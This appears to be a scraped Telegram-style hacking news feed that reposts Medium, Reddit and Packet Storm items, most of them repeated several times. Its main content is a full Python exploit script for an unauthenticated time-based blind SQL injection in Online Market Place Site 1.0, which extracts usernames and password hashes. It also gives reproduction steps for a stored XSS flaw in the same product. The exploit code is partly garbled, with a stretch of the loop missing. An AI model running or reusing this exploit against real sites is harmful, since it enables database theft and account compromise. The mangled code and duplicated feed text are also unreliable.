Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Busy Testnet Desktop Wallet v2 released!
https://cdn-images-1.medium.com/max/1200/1*VC4ycSus1fqX8yv_mt3zHA.png
We have released a beta version of the Busy Desktop Wallet V2. The wallet can be downloaded from our BusyDesktopWallet GitHub repository.
Continue reading on BusyTechnology »
___________________________
@hacking_Attack
@Hacking_Video
Busy Testnet Desktop Wallet v2 released!
https://cdn-images-1.medium.com/max/1200/1*VC4ycSus1fqX8yv_mt3zHA.png
We have released a beta version of the Busy Desktop Wallet V2. The wallet can be downloaded from our BusyDesktopWallet GitHub repository.
Continue reading on BusyTechnology »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Busy Testnet Desktop Wallet v2 released!
We have released a beta version of the Busy Desktop Wallet V2. The wallet can be downloaded from our BusyDesktopWallet GitHub repository.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Community Testing V2 of BusyChain launched — bug-hunting!
https://cdn-images-1.medium.com/max/1200/1*STnKMUyUdZKFuUd-DEKCfA.png
Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes…
Continue reading on BusyTechnology »
___________________________
@hacking_Attack
@Hacking_Video
Community Testing V2 of BusyChain launched — bug-hunting!
https://cdn-images-1.medium.com/max/1200/1*STnKMUyUdZKFuUd-DEKCfA.png
Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes…
Continue reading on BusyTechnology »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Community Testing V2 of BusyChain launched — bug-hunting!
Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
djinn: 1
https://cdn-images-1.medium.com/max/966/1*2rrFsd80DMUdfOmH41xtuQ.png
Herkese merhaba,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
djinn: 1
https://cdn-images-1.medium.com/max/966/1*2rrFsd80DMUdfOmH41xtuQ.png
Herkese merhaba,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
djinn: 1
Herkese merhaba,
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
10 Security Tips For Crypto Users and Investors
https://cdn-images-1.medium.com/max/1280/0*9XJT4ODLWj7MBrqF.png
One of the most important things about having a self-custodial wallet like MetaMask or keeping digital assets on crypto exchanges is that…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
10 Security Tips For Crypto Users and Investors
https://cdn-images-1.medium.com/max/1280/0*9XJT4ODLWj7MBrqF.png
One of the most important things about having a self-custodial wallet like MetaMask or keeping digital assets on crypto exchanges is that…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
10 Security Tips For Crypto Users and Investors
One of the most important things about having a self-custodial wallet like MetaMask or keeping digital assets on crypto exchanges is that…
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
TikTok Suffers Another Data Breach: Change Your Password ASAP
https://external-preview.redd.it/IjbRRTNoTE3NdyyLYa39tOzPM8bhFowlz67ddXUF3Vg.jpg?width=640&crop=smart&auto=webp&s=a49dad8419767a7c5327ebdf3d43f428085ca6d9 submitted by /u/Seytonic
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
TikTok Suffers Another Data Breach: Change Your Password ASAP
https://external-preview.redd.it/IjbRRTNoTE3NdyyLYa39tOzPM8bhFowlz67ddXUF3Vg.jpg?width=640&crop=smart&auto=webp&s=a49dad8419767a7c5327ebdf3d43f428085ca6d9 submitted by /u/Seytonic
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
TikTok Suffers Another Data Breach: Change Your Password ASAP
Posted in r/hacking by u/Seytonic • 2 points and 1 comment
Community Testing V2 of BusyChain launched — bug-hunting!
https://medium.com/busytechnology/community-testing-v2-of-busychain-launched-bug-hunting-ee3db5cce9de?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/busytechnology/community-testing-v2-of-busychain-launched-bug-hunting-ee3db5cce9de?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Community Testing V2 of BusyChain launched — bug-hunting!
Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes…
Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes…Continue reading on BusyTechnology » (https://medium.com/busytechnology/community-testing-v2-of-busychain-launched-bug-hunting-ee3db5cce9de?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Community Testing V2 of BusyChain launched — bug-hunting!
Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes…
Is this an accurate visualization of the problem with EDR visibility?
https://www.reddit.com/r/redteamsec/comments/x6i3oe/is_this_an_accurate_visualization_of_the_problem/
submitted by /u/Jonathan-Todd (https://www.reddit.com/user/Jonathan-Todd)
[link] (https://i.redd.it/lzsyxd5602m91.png) [comments] (https://www.reddit.com/r/redteamsec/comments/x6i3oe/is_this_an_accurate_visualization_of_the_problem/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/x6i3oe/is_this_an_accurate_visualization_of_the_problem/
submitted by /u/Jonathan-Todd (https://www.reddit.com/user/Jonathan-Todd)
[link] (https://i.redd.it/lzsyxd5602m91.png) [comments] (https://www.reddit.com/r/redteamsec/comments/x6i3oe/is_this_an_accurate_visualization_of_the_problem/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is this an accurate visualization of the problem with EDR visibility?
Posted in r/redteamsec by u/Jonathan-Todd • 1 point and 1 comment
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Market Place Site 1.0 SQL Injection
https://4.bp.blogspot.com/-4tZE0Y76jWM/WWlvMNv2FRI/AAAAAAAAIMQ/Di9LOyWyOssTbh7urhFnaBV0oE1qNf8CgCLcBGAs/s1600/h19.png
Online Market Place Site version 1.0 suffers from an unauthenticated blind SQL injection vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Market Place Site 1.0 SQL Injection
https://4.bp.blogspot.com/-4tZE0Y76jWM/WWlvMNv2FRI/AAAAAAAAIMQ/Di9LOyWyOssTbh7urhFnaBV0oE1qNf8CgCLcBGAs/s1600/h19.png
Online Market Place Site version 1.0 suffers from an unauthenticated blind SQL injection vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.
SHA-256 |
055275be279445d5466385d61a0e67c90bd2c9c88469b4e802f1402fe98446beDownload
# Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection
# Exploit Author: Joe Pollock
# Date: September 03, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: CVE-2022-30004 (RESERVED)
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.
# This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection.
# By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.
# Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.
# Ex: python3 omps.py 10.14.14.2
import sys, requests, urllib3
USERID=0
def main():
if len(sys.argv) != 2:
print("(+) usage: %s 2):
extracted_char = chr(c)
sys.stdout.write(extracted_char)
sys.stdout.flush()
sys.stdout.write("\t")
# Get password hash
for p in range (1,65):
injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)
for c in range(32, 126):
files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}
#print(injection_string.replace("[CHAR]", str(c)))
r = requests.post(target, files=files)
if (r.elapsed.total_seconds() > 2):
extracted_char = chr(c)
sys.stdout.write(extracted_char)
sys.stdout.flush()
print("\n(+) done!")
if __name__ == "__main__":
main()
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Market Place Site 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Cisco ASA-X With FirePOWER Services Authenticated Command Injection
___________________________
@hacking_Attack
@Hacking_Video
Cisco ASA-X With FirePOWER Services Authenticated Command Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Cisco ASA-X With FirePOWER Services Authenticated Command Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Market Place Site 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
Online Market Place Site version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Market Place Site 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
Online Market Place Site version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
6dbdfadfd046c1d428d90778b682265b97787399b579cf8c236ae782a910255bDownload
# Exploit Title: Online Market Place Site v1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Joe Pollock
# Date: September 03, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: CVE-2022-30003 (RESERVED)
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Market Place Site v1.0 suffers from an authenticated stored Cross-Site Scripting (XSS) vulnerability allowing attackers to register
# as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.
To reporduce:
1. Sign as a Seller (or create an account) then add a product by navigating to 'Products' > 'Add New'.
2. Add an XSS payload (e.g. ) within the 'Product Title' and/or 'Short Description' fields.
3. Click 'SAVE' - the XSS payload(s) will be executed immediately or anytime the product is viewed.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Market Place Site 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Apple macOS Remote Events Memory Corruption
___________________________
@hacking_Attack
@Hacking_Video
Apple macOS Remote Events Memory Corruption
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apple macOS Remote Events Memory Corruption
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.